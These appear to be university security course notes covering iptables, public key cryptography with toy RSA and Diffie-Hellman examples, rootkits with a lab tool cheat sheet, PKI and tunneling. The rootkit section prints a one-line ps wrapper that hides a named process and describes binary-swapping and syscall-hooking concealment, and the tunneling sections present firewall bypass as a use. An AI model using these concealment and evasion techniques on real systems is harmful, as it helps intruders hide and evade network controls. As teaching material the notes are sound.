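With --rcheck the source is let back in once 60 seconds have passed since it touched the protected range; with --update every dropped packet restarts the clock, so the source stays blocked until it has been quiet for a full 60 seconds.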

Glossary

Chain: There are 3 predefined chains:

1. INPUT - traffic coming directly to the machine from the outside world
2. FORWARD - traffic passing through the machine, between another networked machine and the outside world
3. OUTPUT - traffic going directly from the machine to the outside world

A chain contains a series of rules. As a packet traverses a chain it will be examined by each rule until it matches a rule that determines its ultimate fate (e.g. by jumping to ACCEPT or DROP). If none of the rules matches and the packet reaches the end of the chain, the policy for the chain will be implemented.

In addition to these 3 predefined chains, you can also create your own chains: user-defined chains. The main differences between user-defined chains and predefined chains are:
- user-defined chains DO NOT have policies
- names for user-defined chains are, by convention, in lowercase

Policy: Determines the fate of the packet (eg. ACCEPT, DROP) if it reaches the
end of the chain. Note, policies only apply for the 3 predefined chains.

Rule: Contains specifications which may match a packet.


If the packet matches the rule, an action will be taken as indicated by the target.

If the packet does not match the rule it will be passed on to the next rule in the chain.

Target: Can be thought of as the action that is taken. Common targets are:

ACCEPT - lets the packet through. iptables stops further processing.
DROP - blocks the packet. iptables stops further processing.
REJECT - blocks the packet and sends an error message (ICMP port unreachable) to the host. iptables stops further processing.
RETURN - is like falling off a chain. If it is the target in a predefined chain, the policy is executed. For a user-defined chain, the packet will continue traversing the previous chain at the rule just after the rule which jumped to the user-defined chain (e.g. if from the INPUT chain the packet jumped from rule2 to sshrules and matched a rule with a RETURN target, the packet will continue traversing the INPUT chain from rule3).
LOG - provides logging for matching packets. There are two additional options for LOG:
    --log-level <name or #>: Specifies the level of logging. Levels are: debug, info, notice, warning, err, crit, alert and emerg (7 to 0). Default is warning (level 4)
    --log-prefix <string>: The string can be up to 29 chars and is put at the start of the log entry so that the log can be uniquely identified.

Week6/NiceNotes
Confidentiality with Public Keys
Public Key Cryptography
Public key cryptography, also known as asymmetric cryptography, is a form of cryptography in which the key used to encrypt a message differs from the key used to decrypt it. Each user has a pair of cryptographic keys:

Private Key
- The private key is kept secret
- Generally the private key is used for message decryption

Public Key
- The public key is made publicly available
- Generally the public key is used for message encryption

Types of Public Key Cryptography


The two main branches of public key cryptography are:

1. Public key encryption: a message encrypted with a recipient's public key cannot be decrypted by anyone except the recipient possessing the corresponding private key. This is used to ensure confidentiality.
2. Digital signatures: a message signed with a sender's private key can be verified by anyone who has access to the sender's public key, thereby proving that the sender signed it and that the message has not been tampered with. This is used to ensure authenticity.

Public Key Cryptography in Practise


Generating the Key

A big random number is used to make a public-key/private-key pair.

Encrypting a Message

In encryption, if Bob wants to send Alice a message that only Alice can read, he encrypts it using Alice's public key. When Alice receives the ciphertext, she'll decrypt it using her private key. i.e. In an encryption scheme anyone can encrypt using the public key, but only the holder of the private key can decrypt. Security depends on the secrecy of the private key.

Using Digital Signatures

In signing, if Alice wanted to send Bob a message that only Alice could have made, she would encrypt the document with her private key, and anyone could decrypt the message using Alice's public key to verify that she was the one who signed it. i.e. in a signature scheme the private key is needed to sign a message, but anyone can check the signature using the public key. Validity depends on private key security.

Diffie-Hellman Key Predistribution Scheme

In the Diffie-Hellman key predistribution scheme, each party generates a public/private key pair and distributes the public key. After obtaining an authentic copy of each other's public keys, Alice and Bob can compute a shared secret offline. The shared secret can be used as the key for a symmetric cipher.

Public Key Encryption


Merkle

Synopsis: Say Alice wants to talk to Bob to set up a session key over an insecure channel. Alice has a large numbered notepad and she writes a different password onto each page. Alice then makes a copy of that notepad, encrypts each page (including the page number) weakly enough that one page can be brute forced, rips out page after page and sends them off to Bob in random order. Bob, upon receiving all of these encrypted pages, chooses one at random and brute forces out the password. Once this is done, he sends the page number back to Alice, and they start using the password on that page as their session key.

Why this works: This algorithm works because the password is never actually sent through the channel directly. As an example, assume Trudy has been sniffing the channel and has passively intercepted all messages. She has an encrypted copy of every page of the notepad and knows which page number the password is on. However, to actually work out the password, she has to brute force the encryption of page after page until she finds that page number (as the page number is also encrypted). On average, she will have to brute force approximately half of all the pages sent before she finds Alice and Bob's password page.

Diffie-Hellman

Synopsis: This algorithm takes advantage of the commutative property of powers, i.e. $(g^a)^b = (g^b)^a = g^{ab}$, and of the fact that, given $g^a$ and $g^b$ (mod p), it is still believed to be hard (non-polynomial) to work out $g^{ab}$.

Step-by-step (sourced from Wikipedia)

Here Alice has her own secret a, Bob has his own secret b, and the shared secret is $g^{ab} \bmod p$, which is equal to $g^{ba} \bmod p$. Yet someone sniffing the channel only receives $g^a \bmod p$ and $g^b \bmod p$, and there is no known fast method of working out $g^{ab} \bmod p$ from these.
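The exchange can be tried out with toy numbers. The values p = 23, g = 5, a = 4 and b = 3 below are chosen purely for illustration and are far too small to be secure; the function name is also made up.

```python
def dh_exchange(p, g, a, b):
    """Run a Diffie-Hellman exchange and return (A, B, alice_key, bob_key)."""
    A = pow(g, a, p)            # Alice sends g^a mod p over the channel
    B = pow(g, b, p)            # Bob sends g^b mod p over the channel
    alice_key = pow(B, a, p)    # Alice computes (g^b)^a mod p
    bob_key = pow(A, b, p)      # Bob computes (g^a)^b mod p
    return A, B, alice_key, bob_key

if __name__ == "__main__":
    A, B, alice_key, bob_key = dh_exchange(p=23, g=5, a=4, b=3)
    print("sent over the channel:", A, B)
    print("shared secret:", alice_key, bob_key)
```

An eavesdropper sees p, g, A and B but not a or b. With numbers this small the secret exponents can be found by trial and error, which is why real deployments use very large primes.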

RSA

Synopsis: This algorithm relies on the mathematical hardness of factoring large numbers.

The algorithm:
1. First choose two large primes p and q
2. Calculate $n = p \times q$
3. Calculate the totient $\phi = (p-1)(q-1)$
4. Find a number e which is relatively prime to $\phi$
5. Calculate d such that $de = 1 \bmod \phi$

From this, we have the public key pairing (n, e) and the private key pairing (n, d).

Encryption using the public key: $\text{ciphertext} = \text{message}^e \bmod n$
Decryption using the private key: $\text{message} = \text{ciphertext}^d \bmod n$

Further Explanation

1. Choose two large prime numbers, p and q. RSA Laboratories recommended that the product of p and q be on the order of 768 bits for personal use and 1024 bits for corporate use (these sizes are now considered too small; 2048 bits or more is the usual minimum today). The larger the values, the more difficult it is to break RSA, but the longer it takes to perform the encoding and decoding.
2. Compute n = pq and z = (p - 1)(q - 1).
3. Choose a number e (where e < n) which has no common factors (other than 1) with z. (In this case, e and z are said to be relatively prime.) The letter e is used since this value will be used in encryption.
4. Find a number d such that ed - 1 is exactly divisible (that is, with no remainder) by z. The letter d is used because this value will be used in decryption. Put another way, given e, we choose d such that the integer remainder when ed is divided by z is 1. (The integer remainder when an integer x is divided by the integer n is denoted x mod n.)
5. The public key is the pair of numbers (n, e), and the private key is the pair of numbers (n, d).

Example & Proof

1. Choose p = 5 and q = 7. (Admittedly, these values are far too small to be secure.)
2. Then n = 35 and z = 24.
3. Choose e = 5, since 5 and 24 have no common factors.
4. Choose d = 29, since 5 * 29 - 1 (that is, ed - 1) is exactly divisible by 24.
5. The public key is the pair (35, 5) and the private key is the pair (35, 29).

Given a bit pattern m, we can compute the encrypted value c by: $c = m^e \bmod n$

To decrypt c: m = c^d mod n

Letting a = 1, b = 2, ..., z = 26:

Encryption
Plaintext letter   m (numeric value)   m^e       c = m^e mod n
l                  12                  248832    17
o                  15                  759375    15
v                  22                  5153632   22
e                  5                   3125      10

Therefore, love => qovj

Decryption
Cipher value (c)   c^d (rounded)                              m = c^d mod n   Plaintext letter
17                 481968572106750915091411825223072000       12              l
15                 12783403948858939111232757568359400        15              o
22                 8.5164331908653770195619449972111e+38      22              v
10                 1e+29                                      5               e
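The worked example can be reproduced in a few lines. This is a sketch using the toy key from the example (n = 35, e = 5, d = 29); the helper names letter_to_num and num_to_letter are made up for illustration.

```python
# Toy RSA with the values from the worked example (p = 5, q = 7).
n, e, d = 35, 5, 29

def letter_to_num(ch):
    """Map a = 1, b = 2, ..., z = 26 (hypothetical helper)."""
    return ord(ch) - ord("a") + 1

def num_to_letter(v):
    """Inverse of letter_to_num (hypothetical helper)."""
    return chr(v + ord("a") - 1)

plaintext = "love"
m = [letter_to_num(ch) for ch in plaintext]
c = [pow(x, e, n) for x in m]            # c = m^e mod n
recovered = [pow(x, d, n) for x in c]    # m = c^d mod n

ciphertext = "".join(num_to_letter(v) for v in c)
decrypted = "".join(num_to_letter(v) for v in recovered)

print(m, c, ciphertext, decrypted)
```

Three-argument pow performs modular exponentiation directly, so the huge intermediate values of c^d never have to be written out.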

Due to the large numbers used in the RSA algorithm, RSA is relatively slow at encrypting.
Why does RSA work?
From above, (m^e mod n)^d mod n = m.
Use a special property: if p and q are prime and n = pq, then x^y mod n = x^(y mod (p-1)(q-1)) mod n.
So, (m^e mod n)^d mod n = m^(ed) mod n, and m^(ed) mod n = m^(ed mod (p-1)(q-1)) mod n.
Given (ed - 1) mod (p-1)(q-1) = 0, we have ed mod (p-1)(q-1) = 1, so m^(ed mod (p-1)(q-1)) mod n = m^1 mod n = m.
Summary of RSA: To use RSA, we calculate the public, private key pairing once and let the public key be known. Now whenever somebody wants to send us a message that only we would be able to decipher, they encrypt it using our public key. However, this leads to the problem of key distribution.
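The argument above can be checked by brute force on the toy key from the example. This is a sketch, not a proof; it assumes Python 3.8 or later for the modular inverse form of pow.

```python
from math import gcd

p, q, e, d = 5, 7, 5, 29
n = p * q
phi = (p - 1) * (q - 1)

# e must share no factor with phi, otherwise no valid d exists.
coprime = gcd(e, phi) == 1

# pow(e, -1, phi) returns the smallest d with e*d = 1 mod phi.
smallest_d = pow(e, -1, phi)

# The d = 29 chosen in the example differs from it by a multiple of phi.
same_class = d % phi == smallest_d

# Decryption undoes encryption for every possible message value.
round_trips = all(pow(pow(m, e, n), d, n) == m for m in range(n))

print(coprime, smallest_d, same_class, round_trips)
```

Any d that leaves remainder 1 when ed is divided by phi works, which is why both 5 and 29 decrypt correctly for this key.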

Digital Signatures
Used for authentication, non-repudiation and unique identification. A signature should be unforgeable (hopefully) and non-transferable.
A digital signature scheme typically consists of three algorithms:
- A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key.
- A signing algorithm which, given a message and a private key, produces a signature.
- A signature verifying algorithm which, given a message, a public key and a signature, either accepts or rejects.
Benefits of digital signatures:
- Authentication
- Integrity (I sent it and this is what I sent)
Drawbacks of digital signatures:
- Non-repudiation
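As a rough illustration of the signing and verifying algorithms, here is a sketch built on textbook RSA. The key values (p = 61, q = 53) and the function names are assumptions chosen for illustration; key generation is replaced by a fixed toy key, and reducing the hash modulo such a small n is nowhere near secure.

```python
import hashlib

# Hypothetical toy key pair: n = 61 * 53, e * d = 1 mod (60 * 52).
N, E, D = 3233, 17, 2753

def digest(message: bytes) -> int:
    """Hash the message and squeeze it into the range of the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def sign(message: bytes) -> int:
    """Signing: apply the private exponent to the message digest."""
    return pow(digest(message), D, N)

def verify(message: bytes, signature: int) -> bool:
    """Verifying: undo the signature with the public exponent and compare."""
    return pow(signature, E, N) == digest(message)

msg = b"I sent it and this is what I sent"
sig = sign(msg)
print(verify(msg, sig))                # genuine signature is accepted
print(verify(msg, (sig + 1) % N))      # altered signature is rejected
```

Only the holder of the private exponent can produce a value that verifies, while anyone with the public key can check it.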

Rootkits
Rootkit: A program (or set of programs) designed to take fundamental control of a computer system without authorisation, while obscuring its presence.
Key features:
- One or more small programs
- Attempt to obscure/hide their presence to last on the system longer
- Generally try to gain root level access, or allow actions as system administrators, hence the name
- While they wish to take over some functionality of a computer, they are not designed to destroy the host machine
Rootkits are designed to do a number of things. These can include:
- Key logger
- Create spam box
- Sniff the entire network for more targets
- Launch DoS attacks (with a large enough number of compromised machines)
- Give back-door access to a computer
- DRM (such as Sony)
- Offer honeypot for other attackers
Rootkits are often confused with both viruses and trojans, and indeed all three share many similar properties. They all use some vulnerability in the computer to get themselves on the system, and try to take over the user's computer. However, there are some key differences. Rootkits, unlike viruses or trojans, do NOT:
- Self replicate (although some may be wrapped in virus code which performs this task)
- Destroy a computer's system

Classification
- Firmware: the rootkit lives in firmware, such as that of a router
- Virtualized: the rootkit loads itself first, then loads the operating system as a virtual machine
- Kernel Module: the rootkit loads itself as a kernel module
- Library: the rootkit replaces or modifies system libraries
- Application: the rootkit replaces or modifies applications such as ls, ps

Rootkit Lifecycle
1. (attacker) Installation of the rootkit
2. (attacker) Hiding the rootkit
3. (user) Detecting the rootkit
4. (user) Removing the rootkit
5. (user) Preventing rootkits being installed

Installation
In order to install a rootkit, root/admin access is usually required. Attackers can gain access via:
- Exploiting vulnerabilities in the host computer, for example the Microsoft GDI buffer overflow
- Social engineering methods. Think of any way a virus/trojan is able to get into a computer; a rootkit is able to do that as well.
Once the attacker has gained privileged access, rootkits are often installed as follows:
- User level: on UNIX, the rootkit is downloaded using ftp, then untarred/unzipped into the desired directory (similarly for Windows based systems). The rootkit can also be compiled on the host machine, to embed itself with the operating system better.
- Kernel mode: a kernel-mode rootkit uses a similar method. It usually installs a false device driver which works in conjunction with kernel code.
As the complexity of the rootkit increases, so does the complexity of the installation procedure.
Hiding
The methods that rootkits use to install themselves also determine how they hide themselves. The level of complexity of a rootkit also defines how hard it can be to find. Since a rootkit is basically a process running in the background, even the most basic rootkit needs to do two basic things:
- Hide the running process
- Hide itself in the directory structure

The simplest approach would be to create a wrapper around the shell commands which would reveal its presence. Such commands could include ps, ls, netstat, du, and more. A sample wrapper for ps could be
ps | egrep -v '<my_process_name>|egrep'

Notice that the egrep also needs to be hidden, otherwise it would reveal the rootkit's presence as well. However, such a script can be easily detected. You could simply cat the ps command and reveal its presence. Also, what happens when a user runs egrep and it does not show? So instead of trying to replace all of the commands with easily detected wrappers, it would be of more benefit to replace each binary directly. Detecting swapped binaries is as simple as comparing the checksum of the system's binary with that of the binary from the distribution server.
More advanced rootkits install themselves as kernel modules. Conceptually, these can be considered to provide a wrapper for the kernel. The modules map certain system calls (such as sys_read) to their own implementations (which could be a keylogger, for example). Any call they are not interested in is simply passed through to the original implementation. The advantage of this is that system utilities such as ls and ps will not produce any trustworthy result about the presence of the rootkit. In addition, loadable module rootkits delete their entries in the kernel's record, thus making them very difficult to detect.
Detection
There are a few ways to detect a rootkit:
- Keep a checksum of each system binary, and store the checksums off the computer. Do routine comparisons of system binaries using the checksums.
- Monitor system logs, especially any deletion of the last log.
- Run some of the rootkit checkers, such as Rootkit Hunter or chkrootkit. They check the default locations of common rootkits for any abnormalities.
- Monitor network usage.
- Monitor the system call table inside the kernel, as a rootkit that hooks system calls will have modified the entries there.
Removing
Unless you have been able to determine exactly what the rootkit has done on your system, trying to uninstall the rootkit can be a hard task. Rootkits don't come with an uninstaller. Also, for most of the decent rootkits which install as kernel modules, it can be impossible to remove the rootkit.
The catch is that even if you are able to remove all the things that you find, you cannot be sure that you have removed the entire rootkit, as there may be something that you have not found. The best (and maybe only) solution is to erase your hard drive and reinstall your operating system.
Preventing
Rootkits (as outlined above) are installed through the vulnerabilities of the system. Thus preventing installation requires you to prevent many of the activities that have already been discussed and will be covered in weeks to come. These include:
- Preventing exploits: make sure the system is up to date
- Building a decent firewall
- Imposing a good security policy, such as minimal privilege
- And more...
Damage
Rootkits can do great damage to a system, not least through the excessive usage of system resources, but also through loss of system information and network security. Once a system is compromised, it is very expensive to estimate the damage caused by rootkits. For example, if a company's computer is compromised, a snapshot of the compromised OS should be kept before the OS is reinstalled, so that security experts can look over the compromised image to determine the level of damage, such as loss of sensitive information, the extent of network sniffing, loss of users' passwords on other systems, and any contact this compromised OS has had with outside networks. One estimate is that a half-hour break-in can lead to 40 man-hours of work to clean it up.
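The checksum comparison suggested under Detection could be sketched as follows. The function names and the list of paths are assumptions for illustration; the notes do not prescribe a tool, and SHA-256 is simply one reasonable choice of checksum.

```python
import hashlib
from pathlib import Path

def sha256_of(path):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def make_baseline(paths):
    """Record a checksum for each binary (hypothetical helper)."""
    return {str(p): sha256_of(p) for p in paths}

def changed_files(baseline):
    """List files that are missing or whose checksum differs from the baseline."""
    changed = []
    for path, known in baseline.items():
        if not Path(path).is_file() or sha256_of(path) != known:
            changed.append(path)
    return changed

if __name__ == "__main__":
    # Example paths only; a real baseline is taken once on a known-clean system.
    binaries = [p for p in ("/bin/ps", "/bin/ls", "/bin/netstat") if Path(p).is_file()]
    baseline = make_baseline(binaries)
    print(changed_files(baseline))   # an empty list means nothing has changed
```

As the notes point out, the baseline has to be stored off the machine, since a rootkit that can replace ps can also replace a checksum file kept next to it.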

Tools for Rootkit Lab


Some of the tools below must be run with root privileges to show complete information. They are:
/usr/sbin/lsof
/bin/ps
/bin/netstat
To do so, put sudo before the command line, like this:
$ sudo /usr/sbin/lsof

lsof
To show all open files, directories, sockets and connections:
# lsof
To show only those belonging to user joe:
# lsof -u joe
To show only those belonging to process ID 3359:
# lsof -p 3359
Since lsof shows the files opened by a process, it can be very useful to check if a process is writing some information to a log file (as a keylogger would do).

ps
Report a snapshot of the current processes. - /bin/ps
To see every process:
# ps -A
or
# ps -eF
or
# ps aux
Note that ps -A shows the process name, and the other two command lines show the full command line of the processes running.
To see every process run by root:
# ps -u root
You can also see the process hierarchy by running this command:
# ps -A -H

netstat
Print network connections, interface statistics - /bin/netstat
List all tcp connections (the same works for udp connections):
# netstat --tcp
List all open sockets:
# netstat -a
To not resolve names:
# netstat -n
List the processes that own the sockets:
# netstat -p
To list all connections, not resolve names and show the processes that own the sockets:
# netstat -nap

top
Display Linux tasks - /usr/bin/top
To monitor processes in real time:
# top
To monitor processes owned by user joe:
# top -U joe
To monitor by process ID, for example PID 3319:
# top -p 3319

grep
Print lines matching a pattern - /bin/grep
Normally used at the end of a pipeline. For example, to find all lines containing the word "root" from ps
# ps -eF | grep "root"

To include the N lines above and below each match in the result, use "-C N" (add "-n" to print line numbers as well), for example,
# cat some_source_code.c | grep -n -C 5 "ToDo"

To display only the lines that do not contain the word "hello",


# cat some_source_code.c | grep -v "hello"

netcat
Netcat can be useful in this lab when you want to check what kind of server is listening on a specific port of a machine. - /bin/nc
This line connects to port 25 on 192.168.200.1. If an email server is running, you should see something like "220 barracuda.cse.unsw.edu.au ESMTP (8034632e795f6f3508e80497835884ea)".
$ nc 192.168.200.1 25
If you want to connect to a port using the UDP protocol, add -u to the nc command line:
$ nc -u 192.168.200.1 2222

Week7/NiceNotes
Engineering Security PKI + SSL

Public Key Infrastructure (PKI)


[Figure: Example of dual control]

PKI arrangements enable computer users without prior contact to be authenticated to each other, and to use the public key information in their public key certificates to encrypt messages to each other. To decrypt, each user has their own private key, which is usually protected by a password and stored locally.
Public Key Infrastructure is an arrangement that binds public keys with their respective user identities by means of a Certificate Authority (CA). The binding is made through a registration process carried out either by software or under human supervision. The certificates contain information such as the user identity, their public key, their binding, validity conditions and other attributes.
The only problem with public keys is how to get them out there.
Key protocol without authentication:
1. He asks for your public key
2. You send him your public key
3. He encrypts the message
4. You get the message, and decrypt it with the private key
The problem with this is that there is no authentication: someone in the middle of the channel could modify the messages (for example, swap in their own public key) and pass them on without anyone knowing. To solve this problem you have a trusted person. You trust this person to give you the correct public key.
Certificate Authority: Theo wants to talk to Luke, so he asks the trusted certificate authority for Luke's key, and the authority gives it to him. You can end up with nets of trust, as certificate authorities sometimes authorise Registration Authorities (RAs).
The CA's private key is used to sign a certificate in order to prevent the certificate from being tampered with. The CA's public key is used to verify that a certificate signed with the CA's private key has not been tampered with.
What is a certificate? A certificate is a token which contains:
- The owner's public key
- The owner's details, such as owner name, country, etc.
What is a Certificate Revocation List (CRL)? A CRL is a list of certificates which can no longer be trusted. This is usually generated by a CA and distributed together with the CA's certificate to the client.
What is the worst thing that can happen with a certificate authority? I could find out later that I was tricked during the authentication stage. CAs come preloaded with the browser. CAs aren't really vetted properly; you just need to have enough money, and Microsoft will add you to the list of certificate authorities. With CAs we are verifying a public key but not an identity.
Purpose
- Authentication (certificates)
- Confidentiality (encryption)
- Integrity (checksum / hash)
- Validity (digital signatures)
Advantages
- No shared secrets
- No key distribution issues
- Difficult to crack
Disadvantages
- Computationally expensive
- Critical that public key identity is known
- Need for a trusted third party

PKI Architecture
[Figure: Week8/NiceNotes/pkidiagram.png]

In the simplest view, PKI has three main groups:
Certificate Authority (CA)
This group consists of trusted organizations whose role is merely to ensure that a certain certificate belongs to the real owner and has not been tampered with by anyone. The CA achieves this objective by signing the certificate that has been submitted to it using the CA's private key. The public key of the CA can be used by the client to verify that the certificate signed by the CA hasn't been tampered with. In order to prevent man in the middle attacks, the CA's certificate usually comes pre-installed in web browsers such as Firefox.
Server
This group consists of the network nodes whose public certificate needs to be signed by a CA to ensure that its certificate has not been tampered with by a man in the middle attack during the client request process.
Client
This group consists of the network nodes which request certificates from servers. After the server's certificate has been received, the client uses the CA's certificate, which is pre-installed, to verify that the certificate it has received has not been tampered with by a man in the middle attack.
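The three roles can be put together in a small sketch. Everything here is an assumption for illustration: the certificate is a plain dictionary rather than a real X.509 structure, the CA key is a toy textbook RSA key (n = 61 * 53), and the field and function names are made up.

```python
import hashlib

# Hypothetical toy CA key pair; the client has (CA_N, CA_E) pre-installed.
CA_N, CA_E, CA_D = 3233, 17, 2753

def _digest(cert_body):
    """Hash the certificate fields into the range of the toy modulus."""
    data = repr(sorted(cert_body.items())).encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % CA_N

def ca_sign(cert_body):
    """CA: sign the submitted certificate with the CA's private key."""
    return dict(cert_body, signature=pow(_digest(cert_body), CA_D, CA_N))

def client_verify(cert, crl):
    """Client: reject revoked certificates, then check the CA's signature."""
    body = {k: v for k, v in cert.items() if k != "signature"}
    if body["serial"] in crl:
        return False
    return pow(cert["signature"], CA_E, CA_N) == _digest(body)

# Server: submits its details and public key to the CA for signing.
server_cert = ca_sign({"serial": 1001, "subject": "Luke", "public_key": (35, 5)})

print(client_verify(server_cert, crl=set()))     # signed and not revoked
print(client_verify(server_cert, crl={1001}))    # listed on the CRL
```

Note that the check only ties the public key to whatever the CA was told at registration, which is the limitation raised above: the client verifies a signature, not an identity.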

Tunneling
What is Tunneling?

Encapsulating a packet within another packet for transmission over a network

Definition - Tunneling, also known as "port forwarding," is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network. Tunneling is generally done by encapsulating the private network data and protocol information within the public network transmission units so that the private network protocol information appears to the public network as data. Tunneling allows the use of the Internet, which is a public network, to convey data on behalf of a private network. One approach to tunneling is the Point-to-Point Tunneling Protocol (PPTP) developed by Microsoft and several other companies. The PPTP keeps proprietary data reasonably secure, even though part of the path(s) between or among end users exists in public communication channels. The PPTP makes it possible for authorized users to gain access to a private network - called a virtual private network (VPN) -through an Internet service provider (ISP) or online service. Another commonly used tunneling protocol is generic routing encapsulation (GRE), developed by Cisco Systems. There are numerous, less common tunneling protocols. Tunneling, and the use of a VPN, is not intended as a substitute for encryption/decryption. In cases where a high level of security is necessary, the strongest possible encryption should be used within the VPN itself, and tunneling should serve only as a convenience.

How does encapsulation work for Tunneling?


Encapsulation is the basis of networking. For example, HTTP is encapsulated by TCP, TCP is encapsulated by IP, and IP is often encapsulated in PPP or Ethernet. Encapsulating protocols in an unusual way is often referred to as tunneling. As soon as a firewall lets a single protocol out, tunneling allows anything to be carried inside that protocol, and thus through the firewall.
[Figure: packet encapsulation for IPSec tunneling]
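A toy sketch of the general idea of encapsulation (this is not the real IPSec packet layout): a made-up 3-byte header is wrapped around a payload, and the resulting packet is itself wrapped again as the payload of an outer protocol. The header format and the protocol numbers are assumptions for illustration.

```python
import struct

def encapsulate(proto_id: int, payload: bytes) -> bytes:
    """Prefix the payload with a hypothetical header: protocol id + length."""
    return struct.pack("!BH", proto_id, len(payload)) + payload

def decapsulate(packet: bytes):
    """Strip the hypothetical header and return (protocol id, payload)."""
    proto_id, length = struct.unpack("!BH", packet[:3])
    return proto_id, packet[3:3 + length]

INNER, OUTER = 1, 2   # made-up protocol identifiers

private = encapsulate(INNER, b"private network data")
tunnelled = encapsulate(OUTER, private)     # the inner packet is just data here

outer_proto, outer_payload = decapsulate(tunnelled)
inner_proto, inner_payload = decapsulate(outer_payload)

print(outer_proto, inner_proto, inner_payload)
```

To the outer protocol the whole inner packet, header included, is opaque data, which is why intermediate nodes need not know a tunnel exists.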

Why Tunneling?
- When a packet carries a payload over an incompatible delivery network (protocol incompatible and/or address incompatible)
- When we need a secure path through an untrusted network (encrypt insecure traffic over the internet)
- When we need to send application data through a particular port (sneak through a firewall)

Common ways of Tunneling


Securing traffic

Bypassing firewalls

Stream vs. Datagram tunneling


Stream - Connection between 2 endpoints. Data is put in at one endpoint and sent to the other endpoint. E.g. a phone call between 2 people: once the call is established, all communications are sent through the one connection.
Datagram - Packets sent using an "unreliable" service, such as UDP. Datagrams are self-contained, i.e. each datagram has no relationship with the datagrams which come before or after it. E.g. sending text messages between 2 people: each message is self-contained and independent of the other messages.

Tunneling Protocols
Layer                                  Datagram-based             Stream-based
Application/Session/Transport Layer                               TLS/SSL, SSH, SOCKS
Network Layer                          IPSec, IPV6, GRE
Data Link Layer                        PPPoE/PPPoA, PPTP, L2TP

Datagram-based:
- IPsec
- GRE (Generic Routing Encapsulation): supports multiple protocols and multiplexing
- IP in IP Tunneling: lower overhead than GRE, used when only 1 IP stream is to be tunneled
- L2TP (Layer 2 Tunneling Protocol)
- MPLS (Multi-Protocol Label Switching)
- GTP (GPRS Tunnelling Protocol)
- PPTP (Point-to-Point Tunneling Protocol)
- PPPoE (point-to-point protocol over Ethernet)
- PPPoA (point-to-point protocol over ATM)
- IEEE 802.1Q (Ethernet VLANs)
- DLSw (SNA over IP)
- XOT (X.25 datagrams over TCP)
- IPv6 tunneling: 6to4; 6in4; Teredo
- Anything In Anything (AYIYA; e.g. IPv6 over UDP over IPv4, IPv4 over IPv6, IPv6 over TCP IPv4, etc.)

Stream-based:
- TLS
- SSH
- SOCKS
- HTTP CONNECT command
- Various circuit-level proxy protocols, such as Microsoft Proxy Server's Winsock Redirection Protocol, or WinGate Winsock Redirection Service.

Pros and cons of tunneling


Pros:
- Tunneling provides a means of bypassing firewalls
- Tunneling provides anonymity
- Tunneling provides an encrypted connection
- Tunneling provides an authenticated connection
- Tunneling provides a connection that can be controlled by user administrative relationships
Cons:
- Tunneling opens up a link outside of a secure network which may be compromised
- Tunneling makes firewalls ineffective
- Tunneling is difficult for network administrators to stop

HTTP Tunneling
What is HTTP Tunneling?
HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel (a bidirectional virtual data connection tunnelled in HTTP requests).
HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting it to be used in conditions of restricted network connectivity, including firewalled networks, networks behind proxy servers, and NATs.

What is HTTP Tunneling used for?
An HTTP Tunnel is used most often as a means for communication from network locations with restricted connectivity (most often behind NATs, firewalls, or proxy servers), and most often with applications that lack native support for communication in such conditions. Restricted connectivity in the form of blocked TCP/IP ports, blocking of traffic initiated from outside the network, or blocking of all network protocols except a few is a commonly used method to lock down a network to secure it against internal and external threats. By bypassing these restrictions, the following can be achieved:
- Surf the internet and post in forums anonymously by hiding your IP address
- Use applications (games/IM clients/browsers) from behind restrictive firewalls or proxy servers
- Access blocked sites
- Achieve lower gaming pings when ISPs perform 'throttling' or 'packet shaping'

How does HTTP Tunneling work?
The application that wishes to communicate with a remote host opens an HTTP connection to a mediator server, which acts as a relay of communications to and from the remote host. The application then communicates with the mediator server using HTTP requests, encapsulating the actual communications within those requests. The mediator server is required to be in a network location with sufficiently unrestricted connectivity. The mediator server unwraps the actual data before forwarding it to the remote host in question. Symmetrically, when it receives data from the remote host, it wraps it in the HTTP protocol before sending it as part of an HTTP response to the application. In this situation, the application plays the role of a Tunneling Client, while the remote host plays the role of the server being communicated with.

How does the HTTP Tunneling protocol work?
When an HTTP connection is made through a proxy server, the client (usually the browser) sends the request to the proxy. The proxy opens the connection to the destination, sends the request, receives the response and sends it back to the client. The HTTP protocol specifies a request method called CONNECT. The CONNECT method can be used by the client to inform the proxy server that a connection to some host on some port is required. The proxy server, if it allows such connections, tries to connect to the destination address specified in the request header. If the operation fails, it sends back a negative HTTP response to the client and closes the connection. If the operation succeeds, it sends back a positive HTTP response and the connection is considered established. After that, the proxy does not care what data is transferred between the client requesting the connection and the destination. It just forwards data in both directions, acting as a tunnel.
We are interested in the CONNECT method from the HTTP protocol. After the application opens a connection with the proxy server, it must send the connect request in the form of an HTTP request:
CONNECT <destination_address>:<destination_port> <http_version><CR><LF>
<header_line><CR><LF>
<header_line><CR><LF>
...
<header_line><CR><LF>
<CR><LF>

The proxy server processes the request and tries to make a connection to <destination_address>:<destination_port>. The proxy server sends back an HTTP response in the form:
<http_version> <code> <message><CR><LF>
<header_line><CR><LF>
<header_line><CR><LF>
...
<header_line><CR><LF>
<CR><LF>

If it is a positive response (code=200), then after the empty line the proxy begins to act as a tunnel and forwards data. If it is a negative response (code!=200), then the connection is closed after the empty line.

Disadvantages of using HTTP Tunneling?
- The tunnel is public: anyone can use your tunnel. You could be held liable for what anybody has done with your tunnel.
- The tunnel is cleartext: anyone can spy on your connection. Your passwords (SMTP, POP3, telnet...) are transmitted in clear text.
- The tunnel is not protected: anyone can alter the datastream.
- You have to run a new instance of the HTTP Tunnel client and the server for each new tunnel you want to set up.

Countermeasures to the HTTP Tunneling disadvantages?
Use SSH. SSH provides:
- authentication (only authorised users can use the tunnel)
- privacy (no one can spy on what's going through the tunnel)
- integrity (no one can tamper with data going through the tunnel)
